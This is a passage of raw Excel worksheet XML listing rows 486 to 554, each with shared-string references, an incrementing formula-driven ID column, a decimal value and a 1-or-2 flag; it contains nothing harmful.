      <c r="F486">
        <v>1</v>
      </c>
    </row>
    <row r="487" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A487" t="s">
        <v>944</v>
      </c>
      <c r="B487" t="s">
        <v>945</v>
      </c>
      <c r="C487">
        <f t="shared" si="7"/>
        <v>10039146</v>
      </c>
      <c r="D487" t="s">
        <v>947</v>
      </c>
      <c r="E487">
        <v>12.42344856262207</v>
      </c>
      <c r="F487">
        <v>2</v>
      </c>
    </row>
    <row r="488" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A488" t="s">
        <v>948</v>
      </c>
      <c r="B488" t="s">
        <v>949</v>
      </c>
      <c r="C488">
        <f t="shared" si="7"/>
        <v>10040399</v>
      </c>
      <c r="D488" t="s">
        <v>950</v>
      </c>
      <c r="E488">
        <v>23.581766128540039</v>
      </c>
      <c r="F488">
        <v>1</v>
      </c>
    </row>
    <row r="489" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A489" t="s">
        <v>948</v>
      </c>
      <c r="B489" t="s">
        <v>949</v>
      </c>
      <c r="C489">
        <f t="shared" si="7"/>
        <v>10041652</v>
      </c>
      <c r="D489" t="s">
        <v>951</v>
      </c>
      <c r="E489">
        <v>13.72000217437744</v>
      </c>
      <c r="F489">
        <v>2</v>
      </c>
    </row>
    <row r="490" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A490" t="s">
        <v>952</v>
      </c>
      <c r="B490" t="s">
        <v>953</v>
      </c>
      <c r="C490">
        <f t="shared" si="7"/>
        <v>10042905</v>
      </c>
      <c r="D490" t="s">
        <v>954</v>
      </c>
      <c r="E490">
        <v>17.79807281494141</v>
      </c>
      <c r="F490">
        <v>1</v>
      </c>
    </row>
    <row r="491" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A491" t="s">
        <v>952</v>
      </c>
      <c r="B491" t="s">
        <v>953</v>
      </c>
      <c r="C491">
        <f t="shared" si="7"/>
        <v>10044158</v>
      </c>
      <c r="D491" t="s">
        <v>955</v>
      </c>
      <c r="E491">
        <v>15.43461894989014</v>
      </c>
      <c r="F491">
        <v>2</v>
      </c>
    </row>
    <row r="492" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A492" t="s">
        <v>956</v>
      </c>
      <c r="B492" t="s">
        <v>957</v>
      </c>
      <c r="C492">
        <f t="shared" si="7"/>
        <v>10045411</v>
      </c>
      <c r="D492" t="s">
        <v>958</v>
      </c>
      <c r="E492">
        <v>30.197391510009769</v>
      </c>
      <c r="F492">
        <v>1</v>
      </c>
    </row>
    <row r="493" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A493" t="s">
        <v>956</v>
      </c>
      <c r="B493" t="s">
        <v>957</v>
      </c>
      <c r="C493">
        <f t="shared" si="7"/>
        <v>10046664</v>
      </c>
      <c r="D493" t="s">
        <v>959</v>
      </c>
      <c r="E493">
        <v>1.1068626772612329E-3</v>
      </c>
      <c r="F493">
        <v>2</v>
      </c>
    </row>
    <row r="494" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A494" t="s">
        <v>960</v>
      </c>
      <c r="B494" t="s">
        <v>961</v>
      </c>
      <c r="C494">
        <f t="shared" si="7"/>
        <v>10047917</v>
      </c>
      <c r="D494" t="s">
        <v>962</v>
      </c>
      <c r="E494">
        <v>33.223396301269531</v>
      </c>
      <c r="F494">
        <v>1</v>
      </c>
    </row>
    <row r="495" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A495" t="s">
        <v>960</v>
      </c>
      <c r="B495" t="s">
        <v>961</v>
      </c>
      <c r="C495">
        <f t="shared" si="7"/>
        <v>10049170</v>
      </c>
      <c r="D495" t="s">
        <v>963</v>
      </c>
      <c r="E495">
        <v>7.9289746284484863</v>
      </c>
      <c r="F495">
        <v>2</v>
      </c>
    </row>
    <row r="496" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A496" t="s">
        <v>964</v>
      </c>
      <c r="B496" t="s">
        <v>965</v>
      </c>
      <c r="C496">
        <f t="shared" si="7"/>
        <v>10050423</v>
      </c>
      <c r="D496" t="s">
        <v>966</v>
      </c>
      <c r="E496">
        <v>29.252666473388668</v>
      </c>
      <c r="F496">
        <v>1</v>
      </c>
    </row>
    <row r="497" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A497" t="s">
        <v>964</v>
      </c>
      <c r="B497" t="s">
        <v>965</v>
      </c>
      <c r="C497">
        <f t="shared" si="7"/>
        <v>10051676</v>
      </c>
      <c r="D497" t="s">
        <v>967</v>
      </c>
      <c r="E497">
        <v>0.65639424324035645</v>
      </c>
      <c r="F497">
        <v>2</v>
      </c>
    </row>
    <row r="498" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A498" t="s">
        <v>968</v>
      </c>
      <c r="B498" t="s">
        <v>969</v>
      </c>
      <c r="C498">
        <f t="shared" si="7"/>
        <v>10052929</v>
      </c>
      <c r="D498" t="s">
        <v>970</v>
      </c>
      <c r="E498">
        <v>26.550350189208981</v>
      </c>
      <c r="F498">
        <v>1</v>
      </c>
    </row>
    <row r="499" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A499" t="s">
        <v>968</v>
      </c>
      <c r="B499" t="s">
        <v>969</v>
      </c>
      <c r="C499">
        <f t="shared" si="7"/>
        <v>10054182</v>
      </c>
      <c r="D499" t="s">
        <v>971</v>
      </c>
      <c r="E499">
        <v>7.0775346755981454</v>
      </c>
      <c r="F499">
        <v>2</v>
      </c>
    </row>
    <row r="500" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A500" t="s">
        <v>972</v>
      </c>
      <c r="B500" t="s">
        <v>973</v>
      </c>
      <c r="C500">
        <f t="shared" si="7"/>
        <v>10055435</v>
      </c>
      <c r="D500" t="s">
        <v>974</v>
      </c>
      <c r="E500">
        <v>32.713775634765618</v>
      </c>
      <c r="F500">
        <v>1</v>
      </c>
    </row>
    <row r="501" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A501" t="s">
        <v>972</v>
      </c>
      <c r="B501" t="s">
        <v>973</v>
      </c>
      <c r="C501">
        <f t="shared" si="7"/>
        <v>10056688</v>
      </c>
      <c r="D501" t="s">
        <v>975</v>
      </c>
      <c r="E501">
        <v>5.3830404281616211</v>
      </c>
      <c r="F501">
        <v>2</v>
      </c>
    </row>
    <row r="502" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A502" t="s">
        <v>976</v>
      </c>
      <c r="B502" t="s">
        <v>977</v>
      </c>
      <c r="C502">
        <f t="shared" si="7"/>
        <v>10057941</v>
      </c>
      <c r="D502" t="s">
        <v>978</v>
      </c>
      <c r="E502">
        <v>24.662202835083011</v>
      </c>
      <c r="F502">
        <v>1</v>
      </c>
    </row>
    <row r="503" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A503" t="s">
        <v>976</v>
      </c>
      <c r="B503" t="s">
        <v>977</v>
      </c>
      <c r="C503">
        <f t="shared" si="7"/>
        <v>10059194</v>
      </c>
      <c r="D503" t="s">
        <v>979</v>
      </c>
      <c r="E503">
        <v>10.415719032287599</v>
      </c>
      <c r="F503">
        <v>2</v>
      </c>
    </row>
    <row r="504" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A504" t="s">
        <v>980</v>
      </c>
      <c r="B504" t="s">
        <v>981</v>
      </c>
      <c r="C504">
        <f t="shared" si="7"/>
        <v>10060447</v>
      </c>
      <c r="D504" t="s">
        <v>982</v>
      </c>
      <c r="E504">
        <v>23.701810836791989</v>
      </c>
      <c r="F504">
        <v>1</v>
      </c>
    </row>
    <row r="505" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A505" t="s">
        <v>980</v>
      </c>
      <c r="B505" t="s">
        <v>981</v>
      </c>
      <c r="C505">
        <f t="shared" si="7"/>
        <v>10061700</v>
      </c>
      <c r="D505" t="s">
        <v>983</v>
      </c>
      <c r="E505">
        <v>6.2709579467773438</v>
      </c>
      <c r="F505">
        <v>2</v>
      </c>
    </row>
    <row r="506" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A506" t="s">
        <v>984</v>
      </c>
      <c r="B506" t="s">
        <v>985</v>
      </c>
      <c r="C506">
        <f t="shared" si="7"/>
        <v>10062953</v>
      </c>
      <c r="D506" t="s">
        <v>986</v>
      </c>
      <c r="E506">
        <v>30.105833053588871</v>
      </c>
      <c r="F506">
        <v>1</v>
      </c>
    </row>
    <row r="507" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A507" t="s">
        <v>984</v>
      </c>
      <c r="B507" t="s">
        <v>985</v>
      </c>
      <c r="C507">
        <f t="shared" si="7"/>
        <v>10064206</v>
      </c>
      <c r="D507" t="s">
        <v>987</v>
      </c>
      <c r="E507">
        <v>6.7323718070983887</v>
      </c>
      <c r="F507">
        <v>2</v>
      </c>
    </row>
    <row r="508" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A508" t="s">
        <v>988</v>
      </c>
      <c r="B508" t="s">
        <v>989</v>
      </c>
      <c r="C508">
        <f t="shared" si="7"/>
        <v>10065459</v>
      </c>
      <c r="D508" t="s">
        <v>990</v>
      </c>
      <c r="E508">
        <v>27.387628555297852</v>
      </c>
      <c r="F508">
        <v>1</v>
      </c>
    </row>
    <row r="509" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A509" t="s">
        <v>988</v>
      </c>
      <c r="B509" t="s">
        <v>989</v>
      </c>
      <c r="C509">
        <f t="shared" si="7"/>
        <v>10066712</v>
      </c>
      <c r="D509" t="s">
        <v>991</v>
      </c>
      <c r="E509">
        <v>8.8240662589669228E-3</v>
      </c>
      <c r="F509">
        <v>2</v>
      </c>
    </row>
    <row r="510" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A510" t="s">
        <v>992</v>
      </c>
      <c r="B510" t="s">
        <v>993</v>
      </c>
      <c r="C510">
        <f t="shared" si="7"/>
        <v>10067965</v>
      </c>
      <c r="D510" t="s">
        <v>994</v>
      </c>
      <c r="E510">
        <v>38.079647064208977</v>
      </c>
      <c r="F510">
        <v>1</v>
      </c>
    </row>
    <row r="511" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A511" t="s">
        <v>992</v>
      </c>
      <c r="B511" t="s">
        <v>993</v>
      </c>
      <c r="C511">
        <f t="shared" si="7"/>
        <v>10069218</v>
      </c>
      <c r="D511" t="s">
        <v>995</v>
      </c>
      <c r="E511">
        <v>0.85756081342697144</v>
      </c>
      <c r="F511">
        <v>2</v>
      </c>
    </row>
    <row r="512" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A512" t="s">
        <v>996</v>
      </c>
      <c r="B512" t="s">
        <v>997</v>
      </c>
      <c r="C512">
        <f t="shared" si="7"/>
        <v>10070471</v>
      </c>
      <c r="D512" t="s">
        <v>998</v>
      </c>
      <c r="E512">
        <v>28.39010047912598</v>
      </c>
      <c r="F512">
        <v>1</v>
      </c>
    </row>
    <row r="513" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A513" t="s">
        <v>996</v>
      </c>
      <c r="B513" t="s">
        <v>997</v>
      </c>
      <c r="C513">
        <f t="shared" si="7"/>
        <v>10071724</v>
      </c>
      <c r="D513" t="s">
        <v>999</v>
      </c>
      <c r="E513">
        <v>1.5784193237777799E-4</v>
      </c>
      <c r="F513">
        <v>2</v>
      </c>
    </row>
    <row r="514" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A514" t="s">
        <v>1000</v>
      </c>
      <c r="B514" t="s">
        <v>1001</v>
      </c>
      <c r="C514">
        <f t="shared" si="7"/>
        <v>10072977</v>
      </c>
      <c r="D514" t="s">
        <v>1002</v>
      </c>
      <c r="E514">
        <v>16.72068023681641</v>
      </c>
      <c r="F514">
        <v>1</v>
      </c>
    </row>
    <row r="515" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A515" t="s">
        <v>1000</v>
      </c>
      <c r="B515" t="s">
        <v>1001</v>
      </c>
      <c r="C515">
        <f t="shared" si="7"/>
        <v>10074230</v>
      </c>
      <c r="D515" t="s">
        <v>1003</v>
      </c>
      <c r="E515">
        <v>7.0665044784545898</v>
      </c>
      <c r="F515">
        <v>2</v>
      </c>
    </row>
    <row r="516" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A516" t="s">
        <v>1004</v>
      </c>
      <c r="B516" t="s">
        <v>1005</v>
      </c>
      <c r="C516">
        <f t="shared" si="7"/>
        <v>10075483</v>
      </c>
      <c r="D516" t="s">
        <v>1006</v>
      </c>
      <c r="E516">
        <v>25.816390991210941</v>
      </c>
      <c r="F516">
        <v>1</v>
      </c>
    </row>
    <row r="517" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A517" t="s">
        <v>1004</v>
      </c>
      <c r="B517" t="s">
        <v>1005</v>
      </c>
      <c r="C517">
        <f t="shared" si="7"/>
        <v>10076736</v>
      </c>
      <c r="D517" t="s">
        <v>1007</v>
      </c>
      <c r="E517">
        <v>6.0121984481811523</v>
      </c>
      <c r="F517">
        <v>2</v>
      </c>
    </row>
    <row r="518" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A518" t="s">
        <v>1008</v>
      </c>
      <c r="B518" t="s">
        <v>1009</v>
      </c>
      <c r="C518">
        <f t="shared" si="7"/>
        <v>10077989</v>
      </c>
      <c r="D518" t="s">
        <v>1010</v>
      </c>
      <c r="E518">
        <v>23.211553573608398</v>
      </c>
      <c r="F518">
        <v>1</v>
      </c>
    </row>
    <row r="519" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A519" t="s">
        <v>1008</v>
      </c>
      <c r="B519" t="s">
        <v>1009</v>
      </c>
      <c r="C519">
        <f t="shared" si="7"/>
        <v>10079242</v>
      </c>
      <c r="D519" t="s">
        <v>1011</v>
      </c>
      <c r="E519">
        <v>5.7583761215209961</v>
      </c>
      <c r="F519">
        <v>2</v>
      </c>
    </row>
    <row r="520" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A520" t="s">
        <v>1012</v>
      </c>
      <c r="B520" t="s">
        <v>1013</v>
      </c>
      <c r="C520">
        <f t="shared" si="7"/>
        <v>10080495</v>
      </c>
      <c r="D520" t="s">
        <v>1014</v>
      </c>
      <c r="E520">
        <v>27.555496215820309</v>
      </c>
      <c r="F520">
        <v>1</v>
      </c>
    </row>
    <row r="521" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A521" t="s">
        <v>1012</v>
      </c>
      <c r="B521" t="s">
        <v>1013</v>
      </c>
      <c r="C521">
        <f t="shared" si="7"/>
        <v>10081748</v>
      </c>
      <c r="D521" t="s">
        <v>1015</v>
      </c>
      <c r="E521">
        <v>12.562037467956539</v>
      </c>
      <c r="F521">
        <v>2</v>
      </c>
    </row>
    <row r="522" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A522" t="s">
        <v>1016</v>
      </c>
      <c r="B522" t="s">
        <v>1017</v>
      </c>
      <c r="C522">
        <f t="shared" ref="C522:C585" si="8">C521+1253</f>
        <v>10083001</v>
      </c>
      <c r="D522" t="s">
        <v>1018</v>
      </c>
      <c r="E522">
        <v>29.757680892944339</v>
      </c>
      <c r="F522">
        <v>1</v>
      </c>
    </row>
    <row r="523" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A523" t="s">
        <v>1016</v>
      </c>
      <c r="B523" t="s">
        <v>1017</v>
      </c>
      <c r="C523">
        <f t="shared" si="8"/>
        <v>10084254</v>
      </c>
      <c r="D523" t="s">
        <v>1019</v>
      </c>
      <c r="E523">
        <v>0.36749690771102911</v>
      </c>
      <c r="F523">
        <v>2</v>
      </c>
    </row>
    <row r="524" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A524" t="s">
        <v>1020</v>
      </c>
      <c r="B524" t="s">
        <v>1021</v>
      </c>
      <c r="C524">
        <f t="shared" si="8"/>
        <v>10085507</v>
      </c>
      <c r="D524" t="s">
        <v>1022</v>
      </c>
      <c r="E524">
        <v>27.559329986572269</v>
      </c>
      <c r="F524">
        <v>1</v>
      </c>
    </row>
    <row r="525" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A525" t="s">
        <v>1020</v>
      </c>
      <c r="B525" t="s">
        <v>1021</v>
      </c>
      <c r="C525">
        <f t="shared" si="8"/>
        <v>10086760</v>
      </c>
      <c r="D525" t="s">
        <v>1023</v>
      </c>
      <c r="E525">
        <v>0.1793241947889328</v>
      </c>
      <c r="F525">
        <v>2</v>
      </c>
    </row>
    <row r="526" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A526" t="s">
        <v>1024</v>
      </c>
      <c r="B526" t="s">
        <v>1025</v>
      </c>
      <c r="C526">
        <f t="shared" si="8"/>
        <v>10088013</v>
      </c>
      <c r="D526" t="s">
        <v>1026</v>
      </c>
      <c r="E526">
        <v>19.380825042724609</v>
      </c>
      <c r="F526">
        <v>1</v>
      </c>
    </row>
    <row r="527" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A527" t="s">
        <v>1024</v>
      </c>
      <c r="B527" t="s">
        <v>1025</v>
      </c>
      <c r="C527">
        <f t="shared" si="8"/>
        <v>10089266</v>
      </c>
      <c r="D527" t="s">
        <v>1027</v>
      </c>
      <c r="E527">
        <v>9.2792186737060547</v>
      </c>
      <c r="F527">
        <v>2</v>
      </c>
    </row>
    <row r="528" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A528" t="s">
        <v>1028</v>
      </c>
      <c r="B528" t="s">
        <v>1029</v>
      </c>
      <c r="C528">
        <f t="shared" si="8"/>
        <v>10090519</v>
      </c>
      <c r="D528" t="s">
        <v>1030</v>
      </c>
      <c r="E528">
        <v>26.286136627197269</v>
      </c>
      <c r="F528">
        <v>1</v>
      </c>
    </row>
    <row r="529" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A529" t="s">
        <v>1028</v>
      </c>
      <c r="B529" t="s">
        <v>1029</v>
      </c>
      <c r="C529">
        <f t="shared" si="8"/>
        <v>10091772</v>
      </c>
      <c r="D529" t="s">
        <v>473</v>
      </c>
      <c r="E529">
        <v>11.57111930847168</v>
      </c>
      <c r="F529">
        <v>2</v>
      </c>
    </row>
    <row r="530" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A530" t="s">
        <v>1031</v>
      </c>
      <c r="B530" t="s">
        <v>1032</v>
      </c>
      <c r="C530">
        <f t="shared" si="8"/>
        <v>10093025</v>
      </c>
      <c r="D530" t="s">
        <v>1033</v>
      </c>
      <c r="E530">
        <v>28.988594055175781</v>
      </c>
      <c r="F530">
        <v>1</v>
      </c>
    </row>
    <row r="531" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A531" t="s">
        <v>1031</v>
      </c>
      <c r="B531" t="s">
        <v>1032</v>
      </c>
      <c r="C531">
        <f t="shared" si="8"/>
        <v>10094278</v>
      </c>
      <c r="D531" t="s">
        <v>472</v>
      </c>
      <c r="E531">
        <v>8.384735107421875</v>
      </c>
      <c r="F531">
        <v>2</v>
      </c>
    </row>
    <row r="532" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A532" t="s">
        <v>1034</v>
      </c>
      <c r="B532" t="s">
        <v>1035</v>
      </c>
      <c r="C532">
        <f t="shared" si="8"/>
        <v>10095531</v>
      </c>
      <c r="D532" t="s">
        <v>1036</v>
      </c>
      <c r="E532">
        <v>21.417451858520511</v>
      </c>
      <c r="F532">
        <v>1</v>
      </c>
    </row>
    <row r="533" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A533" t="s">
        <v>1034</v>
      </c>
      <c r="B533" t="s">
        <v>1035</v>
      </c>
      <c r="C533">
        <f t="shared" si="8"/>
        <v>10096784</v>
      </c>
      <c r="D533" t="s">
        <v>468</v>
      </c>
      <c r="E533">
        <v>4.6301136016845703</v>
      </c>
      <c r="F533">
        <v>2</v>
      </c>
    </row>
    <row r="534" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A534" t="s">
        <v>1037</v>
      </c>
      <c r="B534" t="s">
        <v>1038</v>
      </c>
      <c r="C534">
        <f t="shared" si="8"/>
        <v>10098037</v>
      </c>
      <c r="D534" t="s">
        <v>1039</v>
      </c>
      <c r="E534">
        <v>23.422128677368161</v>
      </c>
      <c r="F534">
        <v>1</v>
      </c>
    </row>
    <row r="535" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A535" t="s">
        <v>1037</v>
      </c>
      <c r="B535" t="s">
        <v>1038</v>
      </c>
      <c r="C535">
        <f t="shared" si="8"/>
        <v>10099290</v>
      </c>
      <c r="D535" t="s">
        <v>470</v>
      </c>
      <c r="E535">
        <v>2.1876241953577849E-4</v>
      </c>
      <c r="F535">
        <v>2</v>
      </c>
    </row>
    <row r="536" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A536" t="s">
        <v>1040</v>
      </c>
      <c r="B536" t="s">
        <v>1041</v>
      </c>
      <c r="C536">
        <f t="shared" si="8"/>
        <v>10100543</v>
      </c>
      <c r="D536" t="s">
        <v>1042</v>
      </c>
      <c r="E536">
        <v>32.523979187011719</v>
      </c>
      <c r="F536">
        <v>1</v>
      </c>
    </row>
    <row r="537" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A537" t="s">
        <v>1040</v>
      </c>
      <c r="B537" t="s">
        <v>1041</v>
      </c>
      <c r="C537">
        <f t="shared" si="8"/>
        <v>10101796</v>
      </c>
      <c r="D537" t="s">
        <v>474</v>
      </c>
      <c r="E537">
        <v>10.46168422698975</v>
      </c>
      <c r="F537">
        <v>2</v>
      </c>
    </row>
    <row r="538" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A538" t="s">
        <v>1043</v>
      </c>
      <c r="B538" t="s">
        <v>1044</v>
      </c>
      <c r="C538">
        <f t="shared" si="8"/>
        <v>10103049</v>
      </c>
      <c r="D538" t="s">
        <v>1045</v>
      </c>
      <c r="E538">
        <v>30.38653564453125</v>
      </c>
      <c r="F538">
        <v>1</v>
      </c>
    </row>
    <row r="539" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A539" t="s">
        <v>1043</v>
      </c>
      <c r="B539" t="s">
        <v>1044</v>
      </c>
      <c r="C539">
        <f t="shared" si="8"/>
        <v>10104302</v>
      </c>
      <c r="D539" t="s">
        <v>475</v>
      </c>
      <c r="E539">
        <v>8.9384098052978516</v>
      </c>
      <c r="F539">
        <v>2</v>
      </c>
    </row>
    <row r="540" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A540" t="s">
        <v>1046</v>
      </c>
      <c r="B540" t="s">
        <v>1047</v>
      </c>
      <c r="C540">
        <f t="shared" si="8"/>
        <v>10105555</v>
      </c>
      <c r="D540" t="s">
        <v>1048</v>
      </c>
      <c r="E540">
        <v>25.995849609375</v>
      </c>
      <c r="F540">
        <v>1</v>
      </c>
    </row>
    <row r="541" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A541" t="s">
        <v>1046</v>
      </c>
      <c r="B541" t="s">
        <v>1047</v>
      </c>
      <c r="C541">
        <f t="shared" si="8"/>
        <v>10106808</v>
      </c>
      <c r="D541" t="s">
        <v>465</v>
      </c>
      <c r="E541">
        <v>1.8026289939880371</v>
      </c>
      <c r="F541">
        <v>2</v>
      </c>
    </row>
    <row r="542" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A542" t="s">
        <v>1049</v>
      </c>
      <c r="B542" t="s">
        <v>1050</v>
      </c>
      <c r="C542">
        <f t="shared" si="8"/>
        <v>10108061</v>
      </c>
      <c r="D542" t="s">
        <v>1051</v>
      </c>
      <c r="E542">
        <v>19.21198654174805</v>
      </c>
      <c r="F542">
        <v>1</v>
      </c>
    </row>
    <row r="543" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A543" t="s">
        <v>1049</v>
      </c>
      <c r="B543" t="s">
        <v>1050</v>
      </c>
      <c r="C543">
        <f t="shared" si="8"/>
        <v>10109314</v>
      </c>
      <c r="D543" t="s">
        <v>1052</v>
      </c>
      <c r="E543">
        <v>13.932241439819339</v>
      </c>
      <c r="F543">
        <v>2</v>
      </c>
    </row>
    <row r="544" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A544" t="s">
        <v>1053</v>
      </c>
      <c r="B544" t="s">
        <v>1054</v>
      </c>
      <c r="C544">
        <f t="shared" si="8"/>
        <v>10110567</v>
      </c>
      <c r="D544" t="s">
        <v>1055</v>
      </c>
      <c r="E544">
        <v>28.564386367797852</v>
      </c>
      <c r="F544">
        <v>1</v>
      </c>
    </row>
    <row r="545" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A545" t="s">
        <v>1053</v>
      </c>
      <c r="B545" t="s">
        <v>1054</v>
      </c>
      <c r="C545">
        <f t="shared" si="8"/>
        <v>10111820</v>
      </c>
      <c r="D545" t="s">
        <v>466</v>
      </c>
      <c r="E545">
        <v>13.43832969665527</v>
      </c>
      <c r="F545">
        <v>2</v>
      </c>
    </row>
    <row r="546" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A546" t="s">
        <v>1056</v>
      </c>
      <c r="B546" t="s">
        <v>1057</v>
      </c>
      <c r="C546">
        <f t="shared" si="8"/>
        <v>10113073</v>
      </c>
      <c r="D546" t="s">
        <v>1058</v>
      </c>
      <c r="E546">
        <v>30.036508560180661</v>
      </c>
      <c r="F546">
        <v>1</v>
      </c>
    </row>
    <row r="547" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A547" t="s">
        <v>1056</v>
      </c>
      <c r="B547" t="s">
        <v>1057</v>
      </c>
      <c r="C547">
        <f t="shared" si="8"/>
        <v>10114326</v>
      </c>
      <c r="D547" t="s">
        <v>1059</v>
      </c>
      <c r="E547">
        <v>1.1173690557479861</v>
      </c>
      <c r="F547">
        <v>2</v>
      </c>
    </row>
    <row r="548" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A548" t="s">
        <v>1060</v>
      </c>
      <c r="B548" t="s">
        <v>1061</v>
      </c>
      <c r="C548">
        <f t="shared" si="8"/>
        <v>10115579</v>
      </c>
      <c r="D548" t="s">
        <v>1062</v>
      </c>
      <c r="E548">
        <v>29.637624740600589</v>
      </c>
      <c r="F548">
        <v>1</v>
      </c>
    </row>
    <row r="549" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A549" t="s">
        <v>1060</v>
      </c>
      <c r="B549" t="s">
        <v>1061</v>
      </c>
      <c r="C549">
        <f t="shared" si="8"/>
        <v>10116832</v>
      </c>
      <c r="D549" t="s">
        <v>469</v>
      </c>
      <c r="E549">
        <v>1.1232249736785891</v>
      </c>
      <c r="F549">
        <v>2</v>
      </c>
    </row>
    <row r="550" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A550" t="s">
        <v>1063</v>
      </c>
      <c r="B550" t="s">
        <v>1064</v>
      </c>
      <c r="C550">
        <f t="shared" si="8"/>
        <v>10118085</v>
      </c>
      <c r="D550" t="s">
        <v>1065</v>
      </c>
      <c r="E550">
        <v>23.489187240600589</v>
      </c>
      <c r="F550">
        <v>1</v>
      </c>
    </row>
    <row r="551" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A551" t="s">
        <v>1063</v>
      </c>
      <c r="B551" t="s">
        <v>1064</v>
      </c>
      <c r="C551">
        <f t="shared" si="8"/>
        <v>10119338</v>
      </c>
      <c r="D551" t="s">
        <v>471</v>
      </c>
      <c r="E551">
        <v>5.9388671070337296E-4</v>
      </c>
      <c r="F551">
        <v>2</v>
      </c>
    </row>
    <row r="552" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A552" t="s">
        <v>1066</v>
      </c>
      <c r="B552" t="s">
        <v>1067</v>
      </c>
      <c r="C552">
        <f t="shared" si="8"/>
        <v>10120591</v>
      </c>
      <c r="D552" t="s">
        <v>1068</v>
      </c>
      <c r="E552">
        <v>21.48374176025391</v>
      </c>
      <c r="F552">
        <v>1</v>
      </c>
    </row>
    <row r="553" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A553" t="s">
        <v>1066</v>
      </c>
      <c r="B553" t="s">
        <v>1067</v>
      </c>
      <c r="C553">
        <f t="shared" si="8"/>
        <v>10121844</v>
      </c>
      <c r="D553" t="s">
        <v>467</v>
      </c>
      <c r="E553">
        <v>2.8398911952972412</v>
      </c>
      <c r="F553">
        <v>2</v>
      </c>
    </row>
    <row r="554" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A554" t="s">
        <v>1069</v>
      </c>
